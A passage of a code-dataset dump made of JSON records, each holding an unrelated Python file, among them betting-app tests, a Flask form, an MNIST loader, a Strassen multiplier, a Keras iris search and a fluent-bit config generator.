exist\"):\n bt.createBet(email4, valid, 0, 100, 2)\n with pytest.raises(Exception, match=r\"Invalid company code\"):\n bt.createBet(email3, invalid, 0, 100, 2)\n with pytest.raises(Exception, match=r\"User has an existing bet running\"):\n bt.createBet(email1, valid, 0, 100, 2)\n with pytest.raises(Exception, match=r\"Not Enough Capital to Start Bet, You don't have enough capital to pay out if you lose\"):\n bt.createBet(email6, valid, 0, 100, 2)\n with pytest.raises(Exception, match=r\"Cannot have empty bet amount\"):\n bt.createBet(email6, valid, 0, 0, 2)\n with pytest.raises(Exception, match=r\"Cannot have a negative bet amount\"):\n bt.createBet(email6, valid, 0, -5, 2)\n with pytest.raises(Exception, match=r\"Cannot have empty bet amount\"):\n bt.createBet(email6, valid, 0, None , 2)\n\n\n bt.createBet(email3, valid, 0, 100, 2)\n assert True == bt.checkBet(user_id3)\n\ndef test_deleteBet():\n email3 = 'test3@gmail.com'\n email4 = 'test4@gmail.com'\n user_id3 = tr.getUserId(email3)\n\n with pytest.raises(Exception, match=r\"Email doesn't exist\"):\n bt.deleteBet(email4)\n\n bt.deleteBet(email3)\n assert False == bt.checkBet(user_id3)\n\n with pytest.raises(Exception, match=r\"User does not have a bet\"):\n bt.deleteBet(email3)\n\ndef test_checkWinLose():\n email1 = 'test@gmail.com'\n email2 = 'test2@gmail.com'\n email5 = 'test5@gmail.com'\n\n # Assumes that user has a bet\n # check for a win, return 1\n assert(bt.checkWinLose(email1) == 1)\n\n # check for a loss, return 0\n assert(bt.checkWinLose(email2) == 0)\n\n # check for a unended bet, return -1\n assert(bt.checkWinLose(email5) == -1)\n\ndef test_createBetHistory():\n email1 = 'test@gmail.com'\n email2 = 'test2@gmail.com'\n email3 = 'test3@gmail.com'\n email4 = 'test4@gmail.com'\n valid = 'CBA'\n invalid = '111'\n user_id3 = tr.getUserId(email3)\n\n with pytest.raises(Exception, match=r\"Email doesn't exist\"):\n bt.createBetHistory(email4)\n\n assert(bt.createBetHistory(email1))\n \ndef test_caculateReward(): \n email1 = 'test@gmail.com'\n email2 = 'test2@gmail.com'\n email5 = 'test5@gmail.com'\n\n assert(bt.calculateReward(email1) == 110)\n assert(bt.calculateReward(email2) == -200)\n assert(bt.calculateReward(email5) == 0)\n\ndef test_createBetHistory():\n pytest_setup()\n email1 = 'test@gmail.com'\n email5 = 'test5@gmail.com'\n user_id5 = tr.getUserId(email5)\n user_id1 = tr.getUserId(email1)\n # Call the create bet function for user3\n # Check a betting that hasn't finished\n\n #Create a bet that has finished\n # today = dt.date.today()\n # start_date = today + timedelta(days = -10)\n # start_date = time.mktime(start_date.timetuple())\n # conn = sqlite3.connect('testdb.db')\n # cur = conn.cursor()\n # sql = 'INSERT INTO betting (user_id, company_id, bet_amount, growth, start_price, start_date, multiplier) VALUES (\\'{}\\', 115, 10, 1, 0, \\'{}\\', 10)'.format(user_id3, start_date)\n # cur.execute(sql)\n # conn.commit()\n # conn.close()\n\n # Create a bet_history record that has finished: email1\n bt.createBetHistory(email1)\n # Create a bet_history record that hasn't finished: email5\n bt.createBetHistory(email5)\n\n #Check both of the bet histories\n conn = sqlite3.connect('testdb.db')\n cur = conn.cursor()\n sql = 'SELECT Bet_id, user_id, company_id, bet_amount, growth, reward, status FROM bet_history WHERE user_id = ' + str(user_id1)\n cur.execute(sql)\n res1 = cur.fetchall()\n sql = 'SELECT Bet_id, user_id, company_id, bet_amount, growth, reward, status FROM bet_history WHERE user_id = ' + str(user_id5)\n cur.execute(sql)\n res2 = cur.fetchall()\n assert(res1 == [(1, 1, 115, 10.0, 1, 110.0, 'active')])\n assert(res2 == [(2, 4, 115, 10.0, 0, 0.0, 'active')])\n conn.close()\n\ndef test_updateBetHistory():\n email5 = 'test5@gmail.com'\n user_id5 = tr.getUserId(email5)\n # update email5's bet_history record, it should still be active, updateBetHistory should return false\n assert(bt.updateBetHistory(email5) == False)\n # Directly change the unix time to 10 days ago, \n today = dt.date.today()\n end_date = today + timedelta(days = -10)\n end_date = time.mktime(end_date.timetuple())\n conn = sqlite3.connect('testdb.db')\n cur = conn.cursor()\n sql = 'UPDATE bet_history SET end_date = \\'{}\\' WHERE user_id = {} AND status = \\'{}\\''.format(end_date, user_id5, \"active\")\n cur.execute(sql)\n conn.commit()\n conn.close()\n\n # Call updateBetHistory, it should be updated, changing active status to finished\n\n assert(bt.updateBetHistory(email5) == True)\n conn = sqlite3.connect('testdb.db')\n cur = conn.cursor()\n sql = 'SELECT status FROM bet_history WHERE user_id = ' + str(user_id5)\n cur.execute(sql)\n res1 = cur.fetchall()\n conn.close()\n assert(res1 == [('finished',)])\n \n # Check a user has no active bet running and it is deleted from betting table\n assert(bt.updateBetHistory(email5) == False)\n assert(bt.checkBet(user_id5) == False)\n ","sub_path":"react_app/backend/betting_test.py","file_name":"betting_test.py","file_ext":"py","file_size_in_byte":8797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460063328","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"GET\":\n return render_template(\"index.html\")\n else:\n name = request.form.get(\"name\")\n if not name:\n return \"Who are you?\"\n else:\n return f\"Hello, {name}\"\n\nif __name__ == \"__main__\":\n app.run()","sub_path":"code_examples/python/standard_libs_http/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302228992","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 13 14:47:13 2018\n\n@author: maxdh\n\"\"\"\n\n# How to install: pip install python-mnist\n\n#import random\n#import matplotlib.pyplot as plt\n\nimport numpy as np\nfrom PIL import Image\n\nfrom mnist import MNIST\n\ndef load_train_data( folder, zipped=False ):\n \"load train data of the MNIST database out of the _folder_ folder\"\n \n mndata = MNIST(folder)\n mndata.gz = zipped\n \n images, labels = mndata.load_training()\n \n return images, labels\n \ndef load_testing_data( folder, zipped=False ):\n \"load testing data of the MNIST database out of the _folder_ folder\"\n \n mndata = MNIST(folder)\n mndata.gz = zipped\n \n images, labels = mndata.load_testing()\n \n return images, labels\n \n#def print_data_plt( image, xPixel=0, yPixel=0 ):\n# \"print _image_ with matplotlib; _xPixel_ pixels in x; _yPixel_ pixels in y\"\n# \n# pixels = get_pixel_array(image, xPixel, yPixel)\n# \n# plt.figure()\n# plt.imshow(pixels, cmap='gray')\n# plt.axis('off')\n# \n# plt.show()\n# return\n\ndef save_as_bmp(image, path, xPixel=0, yPixel=0 ):\n pixels = get_pixel_array(image, xPixel, yPixel)\n \n im = Image.fromarray(pixels)\n \n im = im.convert(\"RGB\")\n \n im.save(path)\n \ndef get_pixel_array(image, xPixel=0, yPixel=0):\n pixels = np.array(image, dtype='uint8')\n\n if (xPixel == 0 | yPixel == 0):\n buffer = int(np.sqrt(len(pixels)))\n \n if (buffer**2 == len(pixels)):\n xPixel = buffer\n yPixel = buffer\n else:\n print(\"Error: image isn't squared! Please set _x_ and _y_ pixel number.\")\n return\n \n pixels = pixels.reshape((xPixel,yPixel))\n \n return pixels","sub_path":"lib/DataIO/mnistLib.py","file_name":"mnistLib.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"251309518","text":"import numpy as np\n\n\ndef read_matrix(read_size, stored_size):\n matrix = np.zeros((stored_size, stored_size), dtype=np.int)\n for i in range(read_size):\n matrix[i][:read_size] = list(map(int, input().split()))\n return matrix\n\n\ndef div_matrix(matrix):\n left, right = np.hsplit(np.array(matrix), 2)\n m11, m21 = np.vsplit(left, 2)\n m12, m22 = np.vsplit(right, 2)\n return m11, m12, m21, m22\n\n\ndef strassen(a, b):\n if len(a) == 1:\n return a * b\n\n a11, a12, a21, a22 = div_matrix(a)\n b11, b12, b21, b22 = div_matrix(b)\n\n p1 = strassen(a11 + a22, b11 + b22)\n p2 = strassen(a21 + a22, b11)\n p3 = strassen(a11, b12 - b22)\n p4 = strassen(a22, b21 - b11)\n p5 = strassen(a11 + a12, b22)\n p6 = strassen(a21 - a11, b11 + b12)\n p7 = strassen(a12 - a22, b21 + b22)\n\n c11 = p1 + p4 - p5 + p7\n c12 = p3 + p5\n c21 = p2 + p4\n c22 = p1 - p2 + p3 + p6\n\n return np.vstack((np.hstack((c11, c12)),\n np.hstack((c21, c22))))\n\n\nsize = int(input())\nextended_size = 1\nwhile extended_size < size:\n extended_size *= 2\na = read_matrix(size, extended_size)\nb = read_matrix(size, extended_size)\nresult = strassen(a, b)\n\nfor row in result[:size, :size]:\n print(*row)\n","sub_path":"Paradigm-and-programming-languages/Homework-3/Strassen.py","file_name":"Strassen.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602961523","text":"import sys\nfrom heapq import heappop, heappush\nfrom operator import itemgetter\nfrom collections import deque, defaultdict, Counter\nfrom bisect import bisect_left, bisect_right\ninput = sys.stdin.readline\nsys.setrecursionlimit(10 ** 7)\nMOD = 10**9 + 7\nINF = float('inf')\n\n# modなしの場合は,mod=1にする\n\nclass Combination:\n def __init__(self, size, mod=10**9 + 7):\n self.size = size + 2\n self.mod = mod\n self.fact = [1, 1] + [0] * size\n self.factInv = [1, 1] + [0] * size\n self.inv = [0, 1] + [0] * size\n\n for i in range(2, self.size):\n self.fact[i] = self.fact[i - 1] * i % self.mod\n self.inv[i] = -self.inv[self.mod % i] * (self.mod // i) % self.mod\n self.factInv[i] = self.factInv[i - 1] * self.inv[i] % self.mod\n\n def npr(self, n, r):\n if n < r or n < 0 or r < 0:\n return 0\n return self.fact[n] * self.factInv[n - r] % self.mod\n\n def ncr(self, n, r):\n if n < r or n < 0 or r < 0:\n return 0\n return self.fact[n] * (self.factInv[r] * self.factInv[n - r] % self.mod) % self.mod\n\n def factN(self, n):\n if n < 0:\n return 0\n return self.fact[n]\n\ndef sol():\n N = int(input())\n T = []\n\n for _ in range(N):\n t = int(input())\n T.append(t)\n\n T.sort()\n\n minTime = 0\n now = 0\n for t in T:\n now += t\n minTime += now\n\n cntT = Counter(T)\n comb = Combination(10100)\n ans = 1\n\n for _, c in cntT.items():\n ans = (ans * comb.npr(c, c)) % MOD\n\n print(minTime)\n print(ans)\n\nsol()","sub_path":"AtCoder/arc/035b.py","file_name":"035b.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627798832","text":"# -*- coding: utf-8 -*-\n\nimport unittest\n\nfrom sispy import Client, Error\n\nclass Test(unittest.TestCase):\n\n def __init__(\n self, url, username, password, owner, \n test_schema_name='python_client_test',\n ):\n super(Test, self).__init__()\n\n self.url = url\n self.username = username\n self.password = password\n self.owner = owner\n self.test_schema_name = test_schema_name \n\n def setUp(self):\n self.client = Client(url=self.url)\n\n # auth\n self.client.authenticate(self.username, self.password)\n self.assertIsNotNone(self.client.auth_token)\n\n def tearDown(self):\n response = self.client.schemas.delete(self.test_schema_name)\n\n def runTest(self):\n # create schema\n content = {\n 'name': self.test_schema_name,\n 'track_history': False,\n\n '_sis': {\n 'owner': self.owner,\n },\n\n 'definition': {\n 'field1': 'Number',\n }\n }\n response = self.client.schemas.create(content)\n\n # create entities\n num = 1000\n for i in range(num):\n content = {\n 'field1': i,\n }\n response = self.client.entities(\n self.test_schema_name).create(content)\n\n # search for entitites\n response = self.client.entities(self.test_schema_name).fetch_all()\n\n self.assertIsInstance(response._result, list)\n self.assertEqual(len(response), num)\n\n # update schema\n content = {\n 'name': self.test_schema_name,\n\n '_sis': {\n 'owner': self.owner,\n },\n\n 'definition': {\n 'field1': 'Number',\n 'field2': 'String',\n }\n }\n\n response = self.client.schemas.update(self.test_schema_name, content) \n self.assertTrue('field2' in response['definition']) \n\n # delete_bulk\n response = self.client.entities(self.test_schema_name).delete_bulk(\n query = {\n 'q': { 'field1': 1 }\n }\n )\n self.assertEqual(len(response['success']), 1)\n\n # error\n self.assertRaises(\n Error,\n self.client.entities(\n 'made-up-non-existent-stuff-FAsfsd324'\n ).fetch_all,\n )\n\n","sub_path":"sispy/testsuite/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78919653","text":"import mcpi.minecraft as minecraft\n\n#NOTE - replace \"seanybob\" below with your name\nmc = minecraft.Minecraft.create(address=\"199.96.85.3\", name=\"seanybob\") \n\n#My position in the world\npos = mc.player.getPos()\n\n# This position is the bottom front right of our building (at my position)\nx = pos.x\ny = pos.y\nz = pos.z\n\n# This position is the top back left of our building.\n# Note that we are defining it in relationship to the x/y/z (bottom right front) of our building\n# That is to say, the top back left's x value is the bottom right front's x value + 10.\nx2 = x + 10\ny2 = y + 5\nz2 = z + 8\n\n#Change block ID above to something else\nmc.setBlocks(x, y, z, x2, y2, z2, 89) #89 = glowstone block ID\n\n#Make it hollow\nair_block_id = 0\nmc.setBlocks(x+1, y+1, z+1, x2-1, y2-1, z2-1, air_block_id)\n\n#Let's remove the roof, so we can add a custom more complex roof later.\n#To do this, let's make a single block tall layer that is pure air, covering the top of the cobblestone building.\n#To do this, start y at y2\nmc.setBlocks(x, y2, z, x2, y2, z2, air_block_id)\n\n#And let's add a roof. It will be three layers of wood, in a pyramid shape.\nmc.setBlocks(x, y2, z, x2, y2, z2, 5) #5 = wood\nmc.setBlocks(x+1, y2+1, z, x2-1, y2+1, z2, 5) #5 = wood\nmc.setBlocks(x+2, y2+2, z, x2-2, y2+2, z2, 5) #5 = wood\n","sub_path":"Example-1.py","file_name":"Example-1.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"443712311","text":"import six\n\n\ndef create_transports(transports, valid_transports):\n if not transports:\n return [create_transport_pair(t) for t in valid_transports]\n\n if isinstance(transports, six.string_types):\n transports = [transports]\n result = [\n (transport_name, transport_options)\n for transport in transports\n for (transport_name, transport_options) in (create_transport_pair(transport),)\n if transport_name in valid_transports\n ]\n if not result:\n raise ValueError('No valid transports provided')\n return result\n\n\ndef create_transport_pair(data):\n if isinstance(data, tuple) and len(data) == 2 and isinstance(data[0], six.string_types):\n return data\n if isinstance(data, six.string_types):\n return data, None\n else:\n raise ValueError('No valid transport provided: %r; expected name or (name, options dict)', data)\n","sub_path":"engineio/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433156828","text":"# 모델 : RandomForestClassfier\n\nfrom inspect import Parameter\nimport numpy as np\n\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, Dropout, Input\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.model_selection import train_test_split, KFold, cross_val_score\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.metrics import accuracy_score\n\n# from sklearn.svm import LinearSVC, SVC\n# from sklearn.neighbors import KNeighborsClassifier\n# from sklearn.linear_model import LogisticRegression\n# from sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom xgboost import XGBClassifier\n\nimport warnings\nwarnings.filterwarnings('ignore')\nimport pandas as pd\n\n# 1. 데이터\n# x, y = load_iris(return_X_y=True)\n# dataset = load_iris()\n# x = dataset.data\n# y = dataset.target\n# print(dataset.DESCR)\n# print(dataset.feature_names)\n# print(x.shape, y.shape) # (150, 4) (150, )\n\ndataset = pd.read_csv('../data/csv/iris_sklearn.csv', header=0, index_col=0)\nx = dataset.iloc[:, :-1]\ny = dataset.iloc[:, -1]\nprint(x.shape, y.shape) # (150, 4) (150, )\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=44)\n\n# OneHotEncoding(tensorflow)\nfrom tensorflow.keras.utils import to_categorical\n# from keras.utils.np_utils import to_categorical\n\ny = to_categorical(y)\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nprint(y_train.shape) # (120, 3) \nprint(y_test.shape) # (30, 3)\n\nkfold = KFold(n_splits=5, shuffle=True)\n\n# 2. 모델 구성\ndef build_model(drop=0.5, optimizer='adam'):\n inputs = Input(shape=(4,), name='input')\n x = Dense(512, activation='relu', name='hidden1')(inputs)\n x = Dropout(drop)(x)\n x = Dense(256, activation='relu', name='hidden2')(x)\n x = Dropout(drop)(x)\n x = Dense(128, activation='relu', name='hidden3')(x)\n x = Dropout(drop)(x)\n outputs = Dense(3, activation='softmax', name='outputs')(x)\n model = Model(inputs=inputs, outputs=outputs)\n model.compile(optimizer=optimizer, metrics=['acc'],\n loss='categorical_crossentropy')\n return model\n\ndef create_hyperparameters():\n batches = [10, 20, 30, 40, 50]\n optimizers = ['rmsprop', 'adam', 'adadelta']\n dropout = [0.1, 0.2, 0.3]\n return {\"batch_size\" : batches, \"optimizer\" : optimizers,\n \"drop\" : dropout}\nhyperparameters = create_hyperparameters() \nmodel2 = build_model()\n\nfrom tensorflow.keras.wrappers.scikit_learn import KerasClassifier\nmodel2 = KerasClassifier(build_fn=build_model, verbose=1)\n\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\n# model = GridSearchCV(SVC(), parameters, cv=kfold) # 파라미터 100% 가동\nsearch = RandomizedSearchCV(model2, hyperparameters, cv=kfold) # 파라미터 100% 가동\n\n# 3. 훈련\nsearch.fit(x_train, y_train, verbose=1)\n\n# 4. 평가, 예측\nsearch.fit(x_train, y_train, verbose=1)\nprint(search.best_params_) # {'optimizer': 'adam', 'drop': 0.1, 'batch_size': 20}\nprint(search.best_estimator_) # \nprint(search.best_score_) # 0.725\nacc = search.score(x_test, y_test)\nprint(\"최종 스코어 : \", acc) # 최종 스코어 : 0.699999988079071\n\n# xgb\n# 최종정답률 0.9416666666666667\n# 0.9416666666666667\n","sub_path":"Study/keras2/keras62_3_iris.py","file_name":"keras62_3_iris.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254998150","text":"#!/usr/bin/env python3\n\n# 功能:快速接入新的日志到es中\n# 版本:1.0\n# 时间:2021-09-06\n# 作者:晓雄\n\nimport yaml\nimport jinja2\nimport os\n\nclass jinja2Handler():\n \"\"\"\n 使用jinja2处理模板的方法集合\n \"\"\"\n def __init__(self, template_path):\n self.template_path = template_path\n\n def create_conf_from_template(self, template_file, info_dict):\n \"\"\"\n 输入模板文件名和对应的字典数据,生成配置文件后返回结果\n \"\"\"\n jinjaFile = jinja2.FileSystemLoader(self.template_path) # 文件路径\n jinjaEnv = jinja2.Environment(loader = jinjaFile) # 定义jinja2环境\n messageJinja = jinjaEnv.get_template(template_file) # 获取模板文件\n\n info = messageJinja.render(info_dict) # 基于字典完成模板填充\n return(info)\n\nclass yamlHandler():\n \"\"\"\n 使用pyyaml处理yaml文件的方法集合\n \"\"\"\n def __init__(self):\n pass\n\n def get_conf_from_yaml(self, conf_file):\n \"\"\"\n 从yaml文件中读取所有配置,以字典类型返回结果\n \"\"\"\n try:\n with open(conf_file, \"r\") as f:\n config_from_file = yaml.load_all(f, Loader = yaml.SafeLoader)\n print(config_from_file)\n config_list = list(config_from_file)\n result_dict = dict()\n for config in config_list:\n print(config)\n result_dict[list(config.keys())[0]] = config\n print(type(result_dict),result_dict)\n return result_dict\n except Exception as e:\n raise e\n\nclass fileHandler():\n \"\"\"\n 文件处理的方法集合\n \"\"\"\n def __init__(self, output_path):\n self.output_path = output_path\n\n def write_conf_to_file(self, conf_file, content):\n try:\n with open(\"{}/{}\".format(self.output_path, conf_file), \"w\") as f:\n f.write(content)\n except Exception as e:\n raise e\n\ndef main():\n # 创建对象\n jh = jinja2Handler('./templates')\n yh = yamlHandler()\n fh = fileHandler('./output')\n\n # 读取配置文件\n all_config = yh.get_conf_from_yaml('fluent.yaml')\n\n # 生成fluent-bit.conf文件\n fluent_bit_result = jh.create_conf_from_template('fluent-bit.conf.template', all_config.get('fluent'))\n fh.write_conf_to_file('fluent-bit.conf', fluent_bit_result)\n\n # 生成input.conf文件\n input_result = jh.create_conf_from_template('input.conf.template', all_config.get('input'))\n fh.write_conf_to_file('input.conf', input_result)\n\n # 生成output-elasticsearch.conf文件\n output_elasticsearch_result = jh.create_conf_from_template('output-elasticsearch.conf.template', all_config.get('input'))\n fh.write_conf_to_file('output-elasticsearch.conf', output_elasticsearch_result)\n\n # 生成parser.conf文件\n parser_result = jh.create_conf_from_template('parsers.conf.template', all_config.get('parser'))\n fh.write_conf_to_file('parsers.conf', parser_result)\n\n # 生成fluent-bit.yaml文件\n path_list_tmp = list()\n for i in all_config.get('input').get('input'):\n path_list_tmp.append(i.get('path'))\n path_list_tmp2 = list(set(path_list_tmp))\n path_list_tmp2.sort(key = path_list_tmp.index)\n path_list = list()\n for i in range(len(path_list_tmp2)):\n path_list.append({\"name\": \"path\" + str(i), \"path\": path_list_tmp2[i]})\n fluent_bit_yaml_result = jh.create_conf_from_template('fluent-bit.yaml.template', {\"paths\": path_list})\n fh.write_conf_to_file('fluent-bit.yaml', fluent_bit_yaml_result)\n\n # 将生成的配置文件更新到k8s中的configMap\n os.system(\"cd ./output && kubectl create configmap fluent-bit-config-es --from-file fluent-bit.conf --from-file input.conf --from-file output-elasticsearch.conf --from-file parsers.conf -o yaml --dry-run -n monitor|kubectl apply -f -\")\n\n # 将生成的yaml文件更新部署到k8s中,并重启pod\n os.system(\"cd ./output && kubectl apply -f fluent-bit.yaml && kubectl get po -n monitor|grep fluent-bit-es|awk '{print $1}'|xargs kubectl delete po -n monitor --force --grace-period=0\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/cFluent/createFluentConf.py","file_name":"createFluentConf.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"370347469","text":"import csv\nimport pandas as pd\nfrom pandas import read_csv\nimport math\nimport numpy as np\nimport pickle\nfrom datetime import datetime\nimport tracemalloc\nfrom time import process_time\n\n\ndef load_data(file_path):\n dataset = read_csv(file_path)\n dataset.dropna(axis=0, how='any', inplace=True)\n\n return dataset\n\n\ndef add_num(datapath, datasave):\n dataadd = pd.read_csv(datapath)\n\n datanew = pd.DataFrame(columns=['NVMe_total_util', 'CPU', 'Memory_used','num_workers'])\n\n i = 4\n num = 1\n while (i < 404):\n for j in range(0, 4):\n datanew = datanew.append([{'NVMe_total_util': dataadd['NVMe_total_util'].loc[j], 'CPU': dataadd['CPU'].loc[j],\n 'Memory_used': dataadd['Memory_used'].loc[j], 'num_workers': num/100}], ignore_index=True)\n i = i + 1\n\n num = num + 1\n\n datanew.to_csv(datasave, index=None)\n\n\ndef get_N(real_data, cluster):\n path = real_data.split('.')\n path_adddata = path[0] + 'a.csv'\n add_num(real_data, path_adddata)\n xpred = load_data(path_adddata)\n\n # model = pickle.load(open('model/XGBoost/'+str(cluster)+'/xg_predict_n.dat', \"rb\"))\n model = pickle.load(open('model/XGBoost/mrp/xgnt_mrp_100_new_metric.dat', \"rb\"))\n metric = pd.read_csv('data/'+str(cluster)+'_100g_data_normalize_metrics.csv')\n\n y_pred = model.predict(xpred)\n\n index = np.array([i for i in range(0, 400)])\n newfind = np.c_[y_pred, index]\n\n findmax = newfind[np.argsort(-newfind[:, 0])]\n\n max_index = np.where(findmax[:, 0] == np.amax(findmax[:, 0]))[0][0]\n max_num = findmax[max_index, 1]\n xgb_max_predmin = xpred.loc[max_num]['num_workers']\n\n num_workers = int(xgb_max_predmin * 100)\n throughput = findmax[0, 0] * metric.iloc[0][3]\n\n return num_workers, throughput\n\n\nif __name__ == '__main__':\n cluster = 'mrp'\n get_N('data/real_time_data/'+str(cluster)+'/predict/30/30_1045/74_real.csv',cluster)\n","sub_path":"N_prediction.py","file_name":"N_prediction.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"369179698","text":"class stack:\n def __init__(self):\n self.stack=[]\n self.count=0\n self.max_count=6\n self.minimum=0\n def push(self,value):\n if self.stack==[]:\n self.stack.append(value)\n self.minimum=value\n elif value Player One's card: {player_one_cards[-1]}\")\n\n\n player_two_cards = [] # Player 2's cards on the table\n player_two_cards.append(player_two.remove_one()) # Player 2 put one card on the table\n print(f\" => Player Two's card: {player_two_cards[-1]}\")\n\n at_war = True\n\n while at_war:\n\n if player_one_cards[-1].value > player_two_cards[-1].value:\n\n # Player One wins this round\n player_one_wins += 1\n\n # Player One gets the cards\n player_one.add_cards(player_one_cards)\n player_one.add_cards(player_two_cards)\n\n # No longer at \"war\", time for next round\n at_war = False\n\n elif player_one_cards[-1].value < player_two_cards[-1].value:\n\n # Player Two wins this round\n player_two_wins += 1\n\n # Player Two gets the cards\n player_two.add_cards(player_one_cards)\n player_two.add_cards(player_two_cards)\n\n # No longer at \"war\", time for next round\n at_war = False\n\n else:\n print(\"\\n========\")\n print(\" WAR!!! \")\n print(\"========\\n\")\n # This occurs when the cards are equal.\n # We'll grab another card each and continue the current war.\n\n # First check to see if player has enough cards\n\n # Check to see if a player is out of cards:\n if len(player_one.all_cards) < 5:\n print(\"\\nPlayer One unable to play war! Game Over at War.\")\n print(\"Player Two wins! Player One loses.\")\n game_on = False\n break\n\n elif len(player_two.all_cards) < 5:\n print(\"\\nPlayer Two unable to play war! Game Over at War.\")\n print(\"Player One wins! Player Two loses.\")\n game_on = False\n break\n # Otherwise, we're still at war, so we'll add the next cards\n else:\n for num in range(5):\n player_one_cards.append(player_one.remove_one())\n player_two_cards.append(player_two.remove_one())\n\n\n # Check if number of rounds is equal to 1000\n if round_num == 1000:\n print(\"\\n\\n\" + \"=\"*29)\n print(\"END OF GAME, TOO MUCH ROUNDS!\")\n print(\"=\" * 29)\n game_on = False\n break\n\n# Display the statistics about the game\nwins_count(player_one_wins, player_two_wins)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462970472","text":"#!/usr/bin/python\n# Copyright 2020 The KNIX Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport time\nimport json\nimport base64\n\ndef handle(event, context):\n if type(event) == type([]):\n return event\n else:\n if type(event) == type({}) \\\n and 'trigger_status' in event \\\n and 'trigger_type' in event \\\n and 'trigger_name' in event \\\n and 'workflow_name' in event \\\n and 'source' in event \\\n and 'data' in event:\n assert(event[\"trigger_type\"] == \"amqp\")\n assert(event[\"trigger_status\"] == \"ready\" or event[\"trigger_status\"] == \"error\")\n if event[\"trigger_status\"] == \"ready\":\n print(\"_!_TRIGGER_START_\" + event['trigger_name'] + \";triggers_amqp_state2;\" + event['workflow_name'] + \";\" + event['source'] + \";\" + event['data'])\n else:\n print(\"_!_TRIGGER_ERROR_\" + event['trigger_name'] + \";triggers_amqp_state2;\" + event['workflow_name'] + \";\" + event['source'] + \";\" + event['data'])\n time.sleep(1)\n return {}\n elif type(event) == type({}):\n return event\n else:\n print(\"ERROR: received event: \" + str(event))\n assert(0)\n\n\n","sub_path":"tests/triggers_amqp/python/triggers_amqp_state2.py","file_name":"triggers_amqp_state2.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433850976","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lite', '0013_auto_20180320_1534'),\n ('room', '0008_room_status'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='pusheruser',\n name='room',\n ),\n migrations.AddField(\n model_name='pusheruser',\n name='app',\n field=models.ForeignKey(verbose_name='\\u6240\\u5c5e\\u5c0f\\u7a0b\\u5e8f', blank=True, to='lite.App', null=True),\n ),\n ]\n","sub_path":"room/migrations/0009_auto_20180322_1514.py","file_name":"0009_auto_20180322_1514.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"259474662","text":"import numpy as np\nimport random\nimport h5py\nimport os\nfrom utils.preprocess import list_filenames\nimport cv2\n\nclass InputHandle:\n def __init__(self, input_param, mode='train'):\n self.paths = input_param['paths']\n self.num_paths = len(input_param['paths'])\n self.name = input_param['name']\n self.input_data_type = input_param.get('input_data_type', 'float32')\n self.output_data_type = input_param.get('output_data_type', 'float32')\n self.minibatch_size = input_param['minibatch_size']\n self.is_output_sequence = input_param['is_output_sequence']\n self.down_sample = input_param['down_sample']\n self.seq_len = input_param['seq_len']\n self.horizon = input_param['horizon']\n self.mode = mode\n self.data = {}\n self.indices = {}\n self.current_position = 0\n self.current_batch_size = 0\n self.current_batch_indices = []\n self.current_input_length = 0\n self.current_output_length = 0\n self.load()\n\n @property\n def dims(self):\n return self.data['dims'][0]\n\n def load(self):\n if not 